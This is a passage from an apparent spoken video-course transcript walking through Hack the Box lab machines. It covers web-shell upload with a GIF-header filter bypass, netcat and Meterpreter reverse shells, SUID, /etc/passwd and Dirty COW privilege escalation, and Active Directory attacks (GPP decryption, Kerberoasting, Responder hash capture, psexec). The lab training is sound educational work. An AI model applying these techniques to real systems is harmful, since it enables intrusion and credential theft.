we already know this works, we can send this and see the response. We can render the response. You can look over here, and it says it was a success. So we can come back over here, and if you look through here, we will see what it tells us. We have this comment here that actually tells us what we need to do next. So this is something you're probably not going to see in real life, but it's something that they've gone ahead and done on a Hack the Box. Is it says I added the file extension HTB to execute as PHP. So what happens is if we change to this, what we'd want to do if we're trying to upload a reverse shell is we would change this to PHP. But in this case, it says PHP is blocked, but we can use .htb. And so the next thing we need to do is if you just try to upload a PHP shell, and I'm telling you this just to save time, it's not going to work, but we need to trick the server into thinking that we are uploading a PHP shell. And I have a gigantic GIF here that is going to take a second for me to highlight and then delete. So I'll just bring you back once this is deleted. Okay, now that we have that all deleted, the reason we kept this right here is because it'll tell the server that we're uploading an image, and that's what we need to do in order to bypass the filter. And so you can actually just go out to Google and just type in pretty much anything .gif and then go to image and just download a GIF so that you can do this. Or you can make a file and you can just make this the beginning of the file and save it and then upload that instead of doing what I just did and deleting all of that mumbo jumbo. But we'll go ahead since we've already deleted it and this file's already here. So we'll call this htb.htb. So that way it will execute as PHP, and we have seen this before. We'll come up here and we're gonna go tell that okay, and we're gonna go web shells. We're gonna grab this web shell that we have used in the past. That is not what I needed. I need this. I need this, and we're gonna come over here and we are literally just going to paste that in, and then I'm gonna change the name to file1 so that way we have it and we'll send it. It tells us that went through. So now what we need to do is we'll actually just refresh this page and we'll resend it. Okay, we have file 1. This is the one we used. We'll click on it. It takes us to the page, and if you remember how web shells work, we just type in $CMD for the command, which was the variable we decided to use, and then a command, who am I, and this should execute. We are www data. Since we have command execution on this box, we can go ahead and delete that. We will grab a reverse shell from a reverse shell cheat sheet. I actually tried to run a Python shell, so I typed in which Python, sent it. It says we have Python. I still could not get the Python shell to run. I also tried bash and I couldn't get that to work. So what I did is I went and I tried Python and I tried bash. I skipped PHP and I decided to go straight for netcat. So this was actually the third one that I tried. And we'll go back over here and we'll just type this in. And what I am going to do is I'm just going to leave this as 1, 2, 3, 4 because I don't really want to have to delete it. 10.14.15. If you remember how this works, we will need a netcat listener. So we'll just go netcat lvnp 1, 2, 3, 4, or whatever port you decided to roll with. We will send that, and it did not hang. So something didn't work. Okay, I wasn't listening. We'll send it again. And let's check our shell. It says it connected. So if we go ID or who am I, it says we are connected to this box. So now what I like to do is I like to have a full interactive shell. So you can go ahead and type in Python because we already checked which Python -C. And I don't know if we've seen this before, but it just gets us this little prompt right here. So we can go import -p, don't need a dash, pty.spawn, and then we come here /bin/bash, and then close this off, and we now have this right here. But for editing purposes later on in the video, because we're gonna have to edit some files, if you just try to edit a file exactly how this is, it doesn't work. You have a mess and it is really quite difficult. You can get around it by importing files. And I can show you guys how to do that later, but I'm going to go ahead and if you hit Command Z, actually I'll just show you. So we ls, if I try to type in GIF and I hit tab, nothing works, and it makes it really difficult to edit files inside some boxes. So we're going to go ahead and hit Command Z. We're going to type in stty raw-echo, and then we'll have this little colon here, and then the FG just brings us back into the box. So you can hit enter, and then you have to hit enter again. And now if we type in GIF and we hit tab, it works, and it also makes it so we can edit files. So I want you to go ahead and see if you can figure out the privilege escalation on this video on your own. So go ahead and see if you can pull over LinPs and run it and find the vulnerability. Okay, how did that go? I'm gonna go ahead and cancel this. We're gonna go ahead and CD over to desktop tools. We're going to need a simple server. And now we have this launched. We can grab LinPs onto our box. So we can go ahead and go wget, and then we can type in our IP address. And then we're going to type in linps.sh, and that should grab. We can bash linps and we'll run that. All right, instead of reading through this linps file here, you're going to see that this box is actually vulnerable to several different vulnerabilities that we have in fact covered, so you can go ahead and do those on your own, but we are just coming out of the SUID privilege escalation, and I want to cover that. So this doesn't actually pick up on the SUID vulnerability, and so what we're going to have to do is we're going to come all the way down here to our command prompt. We're going to go to our payloads, all the things. We're going to copy this and paste this in. The reason I want to cover this is because I told you that these are not always that obvious. So linps doesn't even pick it up because it doesn't recognize this. And also we are going to see one that isn't how you would cover it here in the GTFO bins. So this one is a little bit different than what we have seen already. And honestly, every SUID I have come across is not common. Like they're all different and they all require some Googling. And so when I originally did this with the SUID is I copied this and I typed in cat and then I pasted it in, and we can go ahead and do that. It just gives us back a bunch of unlegible stuff. And so I didn't know exactly what this was doing. So I ended up coming in here and I just tried to execute this file. And if you look and we go, who am I? We are now root. And so SUIDs are a bit tricky. They're not always straightforward. And this one is no exception. It is not how you would expect it to be. And so that is the SUID vulnerability in this box. You can change the password to the etc passwd file, and I would challenge you to go ahead and do that. It is a little tricky on this box, so it may take a few tries. And with that, I will see you in the next video. All right, we are going to go ahead and shoot the etc passwd video. I decided to go ahead and make this video because I was kind of having a little bit of trouble with it myself, getting it to actually load. So I wanted to walk you through exactly how to go ahead and get that done. And also while we're here, if you remember, the way we uploaded this file was we went ahead and put something in here, put something in here. We chose a file and then we did a GIF, and then we just saved those first few characters and then put in our web shell right here. So I actually decided to go ahead and show you another way to do this. You can actually, is a way faster too. You can make your own file just like this. We'll go ahead and we'll cat this out. We just need the GIF 87A and then the web shell, and we just saved it as HTB so that way it would execute the PHP code. If you remember the note we found inside the box, a little clue. And now we don't have to mess with repeater. We don't have to put this inside burp. We don't have to delete those characters. We can just upload this straight away. So we can just choose this file and upload it and submit.
and it goes right through, and we can come over here and we can type in cmd who am I, and we get ww data. So we can go ahead and delete this and upload our netcat shell for this, and I guess we'll just delete all that. Go 10, 14, 15, or we'll just make it 1, 2, 3. And then we need to set up our netcat listener so that we can get a callback on our box here. We'll go ahead and hit enter. Not sure what went wrong. Just try it again. 10, 10, 14, 15. Let's go ahead and send that. That time it looks like it's hanging. If you remember, we need to type in python-c import pty.spawn and whoops. We'll need bin bash and then close all this out. Looks good. And now if you remember, we need to come over here and we hit Command Z to put that in the background, and then we type in stty raw -echo and then the fg, and then we'll hit enter, and then we'll hit enter again. And that's very important to getting this to work, because without that, I really was struggling to edit the etc passwd file. So what we'll do is we'll go ahead and we'll cat the etc passwd. We are going to copy all of this so that way we have it, just so that way we are used to having this in best practice, just in case we screw it up, we have it here, and we can save it right here. We'll go gedit, and we can type in, we'll just save it as passwd, paste that in there, and we're gonna go ahead and copy this root, and we're gonna make a new one, hit enter, and if you remember, we need something to go right there, our new password. So we'll come back over here, we type in open SSL, passwd, password is pass, hit enter, it gives us a new password, we copy it, we replace it with this X, we're going to copy this, copy. Okay, now here comes the tricky part. We're going to go ahead and do vim, and we're going to go etc passwd, hit enter, and we're going to go ahead and, because I don't really care to mess this up too much because it's just a regular practice box, we can come up here, we can hit enter, we're going to paste in our new user, and you can see nothing showed up here except for this T. So what actually ends up happening is we need to hit escape in order to close out, and then we put our colon in, and then we go W exclamation point to overwrite it, and now it's overwritten. But the problem is I'm not able to get out of here, so we have to just go ahead and close that, and we have to make a new tab. We have to set up a new netcat listener and reconnect. And actually, I think this is over here. I'm just going to copy this so I don't have to retype it in. Paste, enter, and now we should be able to cat the etc passwd. Here's our new user. It just saved as T because root didn't get all the way in there. So we can just switch users to T, and then we'll type in the password that we made, and we are now root. So that is a kind of difficult way to get the etc passwd file overwritten. For some reason, no matter what I did, I was unable to write that the correct way into the passwd file, and I had to come over and make my own, copy it, paste it in, and it always deleted the first few characters of root. And this time we luckily had just the T left over. But that is one way to go ahead and overwrite the etc passwd file. So I hope you were able to get this on your own. If not, you can go ahead and try it again, because you're surely going to see this again in the future.
All right. I know that in this course we are not focusing a lot on Metasploit. However, I do think that it's helpful to know. And so we're back here at the Devel machine, however you want to say it, from Hack the Box. And this is where we created our payload. And so one of the things you're going to notice that's different is instead of using the shell underscore reverse TCP, we're going to go ahead and use Meterpreter reverse TCP. We're going to do the same thing with our port, our L host, which is our local host, our machine here that we're running on. We're going to run it as ASPX, and basically everything else is the same. So we'll go ahead and have that generate. And in the meantime, we'll go ahead and open up MSF console, and that is going to open up Metasploit for us. And we're going to go ahead and FTP 10.10.10.5, and it's anonymous. We're going to go binary, put shell, and make sure that it's in there. And now that that's on there, we know we can execute it, but we need to have our handlers. So if you remember, we need to be listening. We have been using netcat to listen, but in this case, we're going to go ahead and we're going to use, I think it's multi-handler. Maybe it's exploit multi-handler. And then we will go and options, and we're going to set our L host, set L host ton 0, and go options, and see our L host is now set. I actually made a mistake. So one of the things we're going to do is we have to have our payload match what we created over here. So we're going to have to copy this. We're going to go to set payload, and then we're going to paste this in. We're going to go options, and we have that going now. Now we click run, and we're going to fire this off again, and it has received the connection. And we're going to go ahead, instead of going into the shell and enumerating, we're going to go ahead and go straight to the privilege escalation. And we're going to go and we're going to background this session. It says it's backgrounding as session 10. And now we are going to run, we're going to run the post. Actually, we have to run this from our session. So we have to go, I think it's sessions-I10. Okay. It's been a while since I've ran some of these commands, so sorry about that. I wasn't too sure. We're going to go ahead, and from here, we are going to run the post multi-recon local exploit suggester, and this should go ahead and pull the information it needs. It's going to turn out similar exploits to those as we saw from the Windows exploit suggester. So we'll go ahead and wait for this to bring back some of the exploits for us. Okay, for me, it actually failed, and I'm not really sure why. So I ran it again, and now we have our exploits here. So what I would recommend is the same thing I did earlier, and I would say start from the top and go down, or start from the bottom and go up, unless you know which one is going to work. And in our case, it's going to be this one right here. So the way we would use this is to copy it. We're going to background our session, and now we're going to use this exploit. We're going to go options. We're going to set the session to 10. And just in case you're wondering, I'm literally just going to go straight through here and set up what needs to be set. So we'll go and we will set lhost to ton 0, and then we'll go options and make sure that it is set. We're actually going to switch the port, and we'll go set L port, and this time we'll just use 2222, and we'll go options, and that looks like it should run. So we'll go ahead and run it, and we will see what happens. And now if we go into shell, drop into a shell, and we can say, who am I? And we are authority system. you can see why people like Metasploit. It's so much easier. It's got everything we need right here. We don't have to go through and search for a bunch of tools. We have the tools loaded for us already. We have the exploits loaded for us, and it's really simple. And I would say use it whenever you can. I know there are some certifications that don't want you to use Metasploit, but then there are some that don't really care. So with that, I would always say exploit with Metasploit if you have the opportunity first, and then go back and try and do it manually to figure out how exactly it's working. So that is this box with the kernel exploit manually, and then also with Metasploit. I'll see you in the next video.
All right, we are going to be going through a Linux kernel exploit. So this is on the box Valentine, and I think it's helpful to see one on Windows and then one on Linux. And so you can go ahead and follow along if you want to open up the box Valentine and go through this, or you can just watch and see how the kernel exploit works on a Linux box. They're pretty similar, and so with that, I thought it would be a good idea to group them together. Okay, we are ready for our privilege escalation. There are a couple of different ways you can escalate with root privileges on this box. And now that I'm thinking about it, I'm hoping that no one else has done these because it can kind of mess things up, and I did not revert the box. So if you haven't started yet, or you just want to risk it, you can go ahead and start without reverting the box like we're about to do. We've gone ahead and SSH'd in. We are on the machine. And we're going to start out with the easy one. So we'll go ahead and we're going to run linps, which you have saw in the privilege escalation portion of the course. And so what we're going to do is come over to, I keep everything in my tools directory. And you can go ahead and wherever you have it, you can go ahead and head over to that location. We will need to host it up with a simple HTTP server. And this just makes it so whenever we make a wget, we can get the folder or the file that is within this folder. And now that is up and going. There's two places I like to get folders to whenever I'm on a machine. I either will use their downloads or their temp folder. And because we're already in the hype directory, we'll just go ahead and cd into the downloads. And I don't think there's going to be anything in here. And so we'll run a wget and we'll go ahead and type in my IP, which I believe is 1415. And it works, so we'll go ahead and run that and see what it pulls down. Now, right away, this gets pulled down, our version. Our version gets pulled down for the kernel. So what we'll do is you can copy this. I would just grab this whole thing, the OS version. I'd copy this and I'd go over to Google and paste it in, and you can read and see what this is vulnerable to. And we're going to go ahead and run an exploit. I've already done that to see what this is vulnerable to. And second, we're going to do that one second. The first and easiest is when you come across here, you see this tmonk session is running as root, and if you're familiar with tmonks, you can you're familiar with this command right here. So the first way to grab this is really simple. So if you had never done this before and I had never done this before and I saw this, I would probably just Google and paste this. I just paste this straight into Google. Maybe look at this right here and paste it into Google and read and see if there's anything I can do with it because it is highlighted. But because we know how to use this, you can go ahead and copy this to hijack this tmonk session that's owned by root. We'll go ahead and cancel that. And you can literally just paste this in and hit enter, and you are root. And so you have root privileges. And so we can go ahead and exit that. That's one way to get root privileges. The other way is through, let me check what I got here. Okay, the other way is through the dirty cow exploit. So if you remember, we were just talking about the OS version. If you go out and Google this version, you'll find that it's
vulnerable to the Dirty Cow exploit. So we can come over to Google. If you type in Dirty Cow exploit GitHub, you can go ahead, click the first one, and we see that it's got pretty good reviews. You can read through the code if you can understand C, check to see what's in here and how it runs. I'm going to go ahead and run it. I've run this before. I've run it on other boxes. So what we're going to do is we're going to copy the link location. We are going to check to make sure the box has GCC. It says that there is no input files. So this box has GCC on it, so it can compile the exploit for us. Sometimes they won't have GCC and you'll have to do it on your actual Kali machine and then pull over the executable file onto the vulnerable server. But because we have GCC here, we're going to go ahead and run this wget on the location we just copied. And then it tells us what to do. It's going to make a default user, and to compile it, we run this script right here. Once it gets done, actually, now that I'm remembering, this machine actually won't run a wget off of this GitHub page. So we have to run the wget, since I copied something else, to our Kali machine, paste, and then we need to run our simple server again, and then we run our wget off of our own box. Oops, 14, 15, I think it saves as dirty.c. And it says that it grabbed it. So we can go ahead and close out of that. Now we can go ahead and GCC this. And if you ls, you should see we have the executable here. And then it tells you this is how to run it. You can either go like this and it'll have no password, or you can run it dirty with some password. So what I'm going to do is I'm going to opt for the second. I'm going to go /dirty, and then I'll just type in, we'll hit enter, it'll ask for a password, we'll type in pass, and it says that it's been added. I don't know why, but mine always seems to hang there. And then if we switch users to Firefart, the new user, and we type in pass, then we can see that it has made a new user with root privileges. That is the second way to solve this box. What I would recommend is waiting a few days and coming back and trying to do this again once it's not quite as fresh in your memory, so that way you can get used to going through the steps of researching, pulling over tools, and compiling the exploits. All right, I'll see you in the next video.
All right, we are going to be starting the Active Directory portion of this course. I have gone back and forth on how exactly to go about teaching this and what is the most helpful way. Originally, I was going to go through and show you each one of the tools you need to know in the beginning to start enumerating Active Directory and getting code execution on an Active Directory network. And then I decided, well, it might not be the most beneficial way just to show a bunch of tools and then walk through some boxes. So I think what we're going to do is there's 3 different boxes that require Active Directory knowledge to get remote code execution on the network. From there to go ahead and get system. So I want to just go through 3 different boxes step by step. I'm going to break out all of the videos so that in the future when you are on an Active Directory machine, you can come back and reference this course and you can click on the specific portion that's relevant to the box you're working on. And so if this portion of the course could be done better, you can go ahead and leave a comment in the bottom of the video and maybe I can reshoot this portion with each individual tool being used, or maybe there's some tool you really want to know about or you've read about somewhere that you think would be helpful and beneficial to others, and I can go ahead and add that to this course. So with that, we're going to go ahead and we're going to begin walking through one of these 3 boxes so that you can begin to understand how Active Directory works and see these tools in action. And with that, I will see you in the next video. All right, we're going to be starting with the box active from Hack the Box. And so I went ahead and ran this nmap scan. The IP address is 10.10.10.100. I ran it with a T5 because I didn't want to wait. And it wasn't pinging, so I went ahead and did the -PN. And we have the nmap scan here. Now this is what a normal looking Active Directory nmap scan is going to look like. Sometimes you'll have a port 80 open or you'll have a web server. Sometimes you won't, and when you don't, you can just look at this and you can just think, okay, here's what I need to do is I'm going to start, if it were me, I'm going to start right here, 139.445, then I would go to 398, then I would hop down to 464. So this is just kind of my method that I would be working through this if this is how I'd go about it. So what we are going to start off with is looking at this port 445, and we'll come over here and we can actually just type in SMB map and it will look just like this. You've seen this before. What we're doing is looking to see if we have any file shares that we have access to with anonymous login. So we can go ahead and run that and see what it pulls down. And it says we have access read only to replication. So you've seen this also before. So we run this SMB map, and then we can also run SMB client, and then it's //10.10.10.100, and then we can run this slash replication, and then we can do a -C, and then we can type in recurse ls. And so what this is going to do is it's going to go through and it's going to run through all of the files and it's going to list them out for us. And this is helpful if you don't mind having your terminal full of stuff. But I like doing this because the other way to go about doing this is to actually log in to the SMB server anonymously and then going through and manually looking at everything. That just takes a lot of time and it's a lot of typing, and it's a lot quicker to just use that command we just saw. But if you wanted to go ahead and do it the manual way, what you would do is just type in SMB client, and then we can type all this in, and we'll just delete this, and then we hit enter, and it should load us with a command prompt. And then you would just have to go in here and you can ls, I don't remember, yeah, dir works too. And then you would just see this little D right here means it's a directory. So you would go ahead and then you would cd into active.htb, and then you would go ahead and look at the files again, and then you would choose whatever folder you wanted to go into, and so on and so forth, and it just really takes forever. So it's a lot quicker to do it this way. When this loads for us, we can start all the way at the top, and we can look and see, okay, if we cd'd into active.htb, this is what you're going to see. And then the way SMB client works is it just is going to go through and list for us each one of these files. It's going to cd into the next one, and then it's going to list it, cd into the next one, and it's going to list it. And so if it were my first time going through here, I would remember these. They could be useful. And then I would just keep on scrolling, but because I would definitely look at users if I was first time on this box, see if I could pull down some users, because if you have a user, you can try and pull down hashes, which we're actually going to see a little bit later with some in-packet tools. So if you can get a user, you might be able to get lucky enough to pull down a user with a password or a password hash that we can crack, and we are actually going to see this. So that is helpful that it has users listed there. If you were on a CTF or some kind of certification, it's possible that they would just throw this user here and then they would give you just a whole list of users just to lead you down a rabbit trail. So you got to be careful of doing something like that. So we have the registry policy, we have groups, and at this point, this is something that's interesting because if you have this groups.xml and you have it inside the policies, this actually is going to have for us
the information we need. And so in order to grab this file, because we're already logged in right here on this SMB server, we can go ahead and just copy this entire thing and save us some time. And we can go ahead and CD to this location. And I don't really want to get this at this specific spot. So I'll just show you what we're going to do is you would go ls and you'd see this, and then you can type in get and then groups.xml. And I'm actually going to move over to a different folder and grab this because it's going to be grabbing right here in my Linux box and I don't really want it there. But that's how you'd go ahead and get this folder. So I'm going to pause the video and I'm going to switch locations, and then we'll go ahead and get this file and look and see what's inside. Okay, so we're going to grab this file. We can close out of here, and then we can go ahead and ls, and then we can cat this out, and we can see what is in here. And so we see we have a password. It is hashed, and we're going to go ahead and crack this in the next video. And then we have a user somewhere around here. Right here we have svctgs as a user. We'll go ahead and pause this here, and we'll go ahead and crack this in the next video. We have this password and we can go ahead and crack it. So what we'll do is we will highlight the entire thing. Now, I don't expect you to know this, but whenever you see something inside the group policies, you can know that this hash is going to be the group policies hash. So you can actually type in gpp-decrypt just like this, and then you should be able just to paste in your hash and then hit enter, and it will go ahead and decrypt that for us. So it tells us this is the password for this account right here. So what we'll do is we'll go ahead and we'll gedit some notes, and we're going to grab this user, paste it in, and then we're going to grab the password so that we have this as well. And now we have those. And what we're going to do, what you would normally do, see, I know where we're going to go because this is really, and I've done this box before, but when you see this SVC TGS, this is telling me this is a ticket granting service, and within Active Directory, you can have tickets for each user, and this right here grants tickets for the user. So if we can somehow grant ourselves a ticket or get a hash, then we get on this box. So that's what ultimately we're going to do, especially when you see this TGS, this ticket granting service. Then you need to be thinking curb roasting or doing something with curb roast. But also something that's really common that you're going to see on Active Directory is this will be a TGT, and it's a ticket granting ticket, and it's the ticket we need in order to get on to the network. So that's a lot of ticket saying, but anytime you're dealing with Active Directory, you're going to hear it a lot. Those are just a couple of little acronyms that you need to be aware of. So with that, what you would do in a normal situation when you don't know what you're doing and you grab a user and a username is you're just going to go ahead and you're going to run SMB map again. So we just go SMB map, and then we're going to go, I think it's a capital U. We'll just type in --help and make sure that we do this right. So we're going to have a user this time. It is a lowercase u and a lowercase p. So what we will do, it tells us a password or an NTLM hash. This NTLM hash, we're going to see this later. This hash is one that we're going to pull down from an Active Directory network. A domain controller can give us this NTLM hash. Sometimes you can grab these with Responder, which we're also going to see later. So it caught me off guard when I saw that NTLM hash. I didn't realize that was a part of SMB map. So that's interesting. So you can note that. Because we are going to see that later. We're not going to use the hash in order to grab this later, in order to go into SMB map later, but it's always useful to know that we can do this in the future just in case we have this hash and we're not able to crack it. So what this gives us the usage here. So the way we're going to do this is we're going to go SMB map -u, and our username was SVC TGS. and our password was GPP still standing strong. We'll paste that in, and then it looks like we give it the host, which is 10.10.10.100. And then this should run, and it'll tell us if we have access to any other shares that we didn't have access to before. And we do. We have access to users, we have access to sysvol now, we have this net login. And so in a normal situation, what you're going to do is you're going to go ahead and you will look in all these that we now have read access to, so that we can enumerate some more. But we're actually not going to go that route, because that's not the route we need to go. But you just go through and you do the exact same thing we just did in order to find this user and this password, and you just go ahead and look through here and see if you can find any more information that would help you gain access to the network. And so show you real quick, you can see the difference. Up here we anonymously had read only right here, but now that we have a user, we have access to different shares. And this will be helpful. Sometimes you will find a user, or you'll have anonymous login, and you'll only have access to one share, and then you'll find another user and you'll have access to 2 shares, and then you'll find another user and you'll finally be able to get onto the network. That does happen, and it does take time, and it does take time to go through and enumerate all of these, but you just got to be patient and run through the enumeration the way it's supposed to be done. So I'll see you in the next video. Okay, we are back, and we're going to continue on with the box active. I'm going to show you 2 different tools from Impacket. First, we'll just come over here, and this is what it looks like. It's Impacket get NP users, and then it's the domain controller, the IP. So we give it the IP, we give it the name, which is active.htb. A lot of times you're going to see in Hack the Box this as HTB, but elsewhere you're going to see this as the username.local. We're actually going to see one later that has a .local. And then the username, and let's pretend we found a username but we don't have a password. And so what we would do is we would try and go -no-pass and see if we could get a TGT from this service. And so unfortunately we're going to run it, but we're not able to get a TGT. But we are going to see this again. We're going to try this again in another box in the future, and I don't actually remember if it works or not. So we will try it out and see if we can get this TGT. If you get a ticket back, you can do a pass the ticket attack. And the tickets last usually, I think it's 10 hours default by Windows. So you can use that ticket. I also see that I got this IP wrong. You can use that ticket and see what you're able to have access to. And we're going to go ahead and we're going to show another Impacket tool. So it will look like this: Impacket -get, and I think that it is users. Yes, it's this one. See, here's a box that was done as spooky.local. That one I think is from Try Hack Me, if I'm remembering right. Now we'll go ahead and type in our active.htb/svc-tgs. We can delete this, and then we'll go ahead and we'll paste in our password here so that we can get this hash. So as you can see, Impacket, we're going to use Impacket here once, we're going to use it again twice, and then we're going to use it a third time to actually get our shell on this box. So it's really important for us to use Impacket and to know how to use it and to make sure you have it. I told you before earlier in this course that if any penetration tester is told they can have one tool, this is usually the tool they're going to go after. So for some reason, this doesn't seem to want to run. All right, so the problem turned out to be I had a dash right here and it needed to be an underscore. So now that we got that resolved, what we can see is we now have the name administrator here that it has spit down for us, and it did not give us the hash, so we're going to go ahead and run this again. Oh, it says that the clock skew is too great. Okay, so this is my box clock, my Kali Linux box right here. The time does not match the time
on the Kerberos Windows machine right here, so you can see the difference. So this error, you are going to get this. Every single time you ever run this, every single time I've run this, it always tells me the clocks don't match. I think you have to be within an hour, and I don't remember how to fix this, so you just paste it in here, and there's going to be a simple way to update this clock in one of these up here. So we'll go ahead and paste that in, and it's going to tell us how to fix this. It's because our time is not linked and the mitigation for it. This is what we're looking for. Maybe it'll be in this GitHub page. I will go ahead and find this and bring you back once I have the mitigation for this. It turns out what you end up having to do is type in sudo apt install ntp date. Go ahead and run it. It will install, and then in order to link up your time, you just type in sudo ntp date and then the IP address, and you hit enter, and that will go ahead and update the time. And then you'll go back over to the Active Directory box that we're working on, and you'll go ahead and run this command, and you will get this output. And so we have the administrator name here, and this is their ticket. So we'll go ahead and copy that, and we'll cd into desktop, HTB, and then we'll go into active, and then we're going to name this gedit hash.txt, and we will paste in the hash, and we can save it, and we're going to use hashcat to crack this. We'll type in cat, and we'll hashcat, and then we can go ahead and copy this, paste it in here, and we're told we need to use 131.100, and so that will be the hashcat type we're going to use. So we'll go ahead and type in hashcat-m 131.00 hash.txt -a, and we're going to use the word list rocku. So we'll go ahead and locate rocku.txt. We will copy this, and now we can go hashcat all over again, -m 131.00, and then we'll go hash, and then we'll paste in the directions to our word list, and we'll see if that runs. This will take a minute, so I will bring you back once hashcat is finished running. Alright, hashcat it has finished running, and here is the password for this hash. You can go ahead and copy this, and we'll go gedit notes, and we can type in I think the user was administrator, so we can come up here, and it's on a different link, but it's administrator, and then this is the password, and we're going to go ahead and log into that in the next video. But what we just did is called curb roasting. So we had the ticket granting service, and it reached out to the domain controller, and we were able to pull down the administrator with their hash, and with that we were able to crack it and grab this password. And so in the next video, because there is no WinRM on this box, we're going to go and get a shell on this Active Directory network in a different way. And with that, I'll see you there. All right, we are back with our final video on the box active, and this is going to be using PS exec to get a shell on the network. So what we're going to do is check our credentials we found in the last time, which are right here, administrator, and this is the password, Ticketmaster 1968. So what we can do before we test the PS exec is you can always come in here and you can use SMB map, just like we did here, and we'll check and see what shares we have. And so we'll paste in our password, and then we can put in the username, administrator, and we can see what shares we have. And if we have the ability to write to all the shares, read, write, right here. If you can read write to this admin, that's the one you need to know. If you can read write to that, you can ps exec into the box, because WinRM is down, so we're going to have to use ps exec, which will use port 139 and 445. So if you go back and check the nmap scan, you will be able to see what I'm talking about. And the way we ps exec is using impacket again. So this is the third time we've used impacket, so we can type in impacket and then dash ps exec, and then we type in active.htb, which is the domain that we're going to be going into, and then we type in administrator as the user we're going to be using at 10 10 10 100, and then we paste in our password, and you're going to see that it is writing to admin. This is why we checked to see if we had read write to admin, and if we do, we get a shell back, and so we can go who am I, and we are int authority system. So that is the box active, and this is how you use ps exec. You will need to know this in the future. You will need to know how to write this syntax, so you can go ahead and save this into your notes. You will for sure see it regularly in the future. You will need to be able to ps exec into Windows boxes once you have credentials. So with that, we will begin the next box on Active Directory in the next video. All right, we are going to be doing Quirier from Hack the Box, and I believe our IP address is 125, and I've already went ahead and ran the nmap scan for us here, and when we go through it, we see SMB is open right here. We have a Microsoft SQL server open right here. We can see the NetBIOS domain name, the box name, htb.local, quirier.htb.local, so we can remember these just in case we need to put something into our Etsy host file. If we get credentials, we can WinRM into the machine, and we see SMB signing is enabled but not required, which is good for us. And when we see that with these SMB ports, we can come over here and we can run SMB map. So we'll try SMB map like this, and we'll see what it pulls down. It pulls back nothing, and because that pulls down nothing, we'll go ahead and try SMB client, and we're going to go -N-L like this to see if we have no credentials, no usernames, and then we want it to list the files in here. The thing about SMB client, as I've mentioned before, is it'll list the shares for us, but it will not tell us which ones are readable. So we'll go ahead and run this again. Seems how it did not pull anything down. All right, that took a few tries, but here it is. And you'll see that we have reports, and we have admin C, IPC, and it doesn't tell us what's accessible to us. So what we're going to do is we're just going to run it again, only we're going to see if we can access what's inside the ports. So we'll access it and see what's inside the reports share, and we'll do it just like this. And we'll go ahead and run this, and we have access here, so we can, is it dir, ls? I think both work. Yep. In order for us to get this, because it has these spaces right here, we're going to do an mget, and then we're going to put that inside quotes. If you don't put it inside quotes, it will not recognize what you're trying to get. So we'll put that in quotes. Yes. And we'll go ahead and exit this. We'll ls, and now that we have this, we can look inside of it. But before we're able to look inside of it, because it has this xlsm, this is a Microsoft file, and it has macros enabled, and so enable for us to look at this, we're going to have to either transfer this over to a Windows machine, which we're not going to do, or we can use a tool. So we can come over here and we can go to OLE tools, and it should pull up a GitHub page for us. And what we're going to do, we'll go to this one right here. What we'll do first is, if you're using an older Kali
box, you can actually just type in apt search OLE tools, and there should be one in here in the Kali repo. This actually does not work for us because it is not the right file, but if you're using an older Kali machine, there should be one that's like Python OLE tools, and you can use a sudo apt get, but because this is a new virtual machine, we will need to install it a different way. So we can come back here, go to OLE tools, and it should have installation instructions. Yes, right here. We'll install with this one right here, or for the Linux. So you'll go ahead and copy this and you'll paste it into your terminal. I've already done that. OLEVBA. And this is what we're going to use to read the file. So once that is done installing, it might take a few minutes, but we'll type in OLEVBA once that's done installing, and then we're going to type in the currency volume, and we're going to have to backspace our spaces right here. We'll have to escape them, and we're going to escape them like this. Oh, it did it for us. So if you just start typing currency and then hit tab, it'll autocomplete. And that should allow us to read the file, and it does. So inside this file, we have a password and a user ID of reporting. So this user ID reporting, and this is our password. So what we'll do is copy this. We'll actually copy it without that quote. Copy. We will gedit notes. We'll paste those in so that way we have them, and then we'll cat out the notes so that way we can just scroll up anytime we need to do this. So the first thing I would try is to automatically come back over here and see what we can do with SMB map and what we can do with SMB client, and see if there's anything else we're able to do. So we'll go SMB client dash U for our user, and it is reporting, and we can go with our dash L for list. We'll use 10 10 10 125. We can leave, we don't need to look into any files, and then we'll hit enter. It might ask us for a password, and we'll copy this, paste, enter, and see what it brings down. And if we have any more access, actually we need to use SMB map for this because SMB client doesn't tell us if we have read access to anything. SMB map, and it is a lowercase u, and we can actually put the password in here when we're using SMB map. So we can go -p space password. Oh, the dash L, we need to get rid of that. We need a -h for the host, and see if we have any read access. It says we have an authentication error, so we don't have the ability to read this just yet. The next thing to do is, now that we have a user, is to see if we can gain access to this server. So the way we're going to do this is we're going to use another impacket tool. So we'll go impacket dash, I think it's MSSQL client. So this is the MySQL client. And then we're going to type in our user, which is reporting. And then we're going to put in the password, which I think is still on my clipboard. It is. Then we're going to type in at the IP address 10 10 10 125, and it says it failed to connect. Oh, the reason this failed is because we need to use a -Windows -auth. Now it allows us to log into MySQL. Now right here, this is the reason I wanted to do this box with you guys, because responder is something you're going to need to know when you're using Active Directory. It is a tool that you will use on a lot of engagements. And this tool is one you're going to see in the future. You will see it in other boxes. You'll see it in CTFs. So it's one you need to know. And so now that we have access here to the MySQL database, we are going to use Responder. But before we do that, we can do our typical enumeration and see if we can show databases. And it doesn't allow us to do this. And so what we're going to do is try and use Responder, because if we type in help, it'll tell us what we can do. So you can try and run this enable CMD. And I believe this does not work. Because this doesn't allow us to enable this, we can still try to run commands through the SQL database. And the way we're going to go about this is running it this way. We'll go xp _ dir tree, and then we're going to end up throwing some shares through this. It doesn't really matter what share you try and put. What we're trying to do is get the SQL server to respond back to us, and you can put anything here. And our goal is to try and get this to respond back to us, and we're going to steal its NTLM hash with Responder. So we're going to go Responder. I believe it's a -i, and then we can run a ton0, and it will grab automatically our IP address here. And when we run this, must be run as root. It tells us we need a capital I. Now that we have Responder running, what Responder is going to do is it tell us right here, it is going to listen on this IP, and anytime machine tries to connect to it, it's going to grab the information. So if we run this, we don't need 10.3. Our IP is not 10.3, it is 10.15. Just notice that up here. So we'll send this, and it says it has gone through. We'll check Responder, and Responder has grabbed the NTLM hash. And so when you look right here, it says the NTLM v2 right here hash. So what we'll end up doing is grabbing this entire hash right here. We can exit out of this. We will gedit hash.txt. We'll paste this in, come back to the front, make sure that it all looks right. We can save that. Now what we'll do is we'll look at our hashcat examples, and we'll look for NTLM v2 right here. It's 5600. And when we run hashcat against this, we're going to go hashcat -m hash.txt, and we'll change this to 5600, and we'll run this, and it's going to tell us we need to send it to the location of rocku.txt. I think I have it in tools, so we'll go Kali, or is it home, Kali, desktop, tools. And now I forgot to specify /rocku.txt. Now that should run, and I'll bring 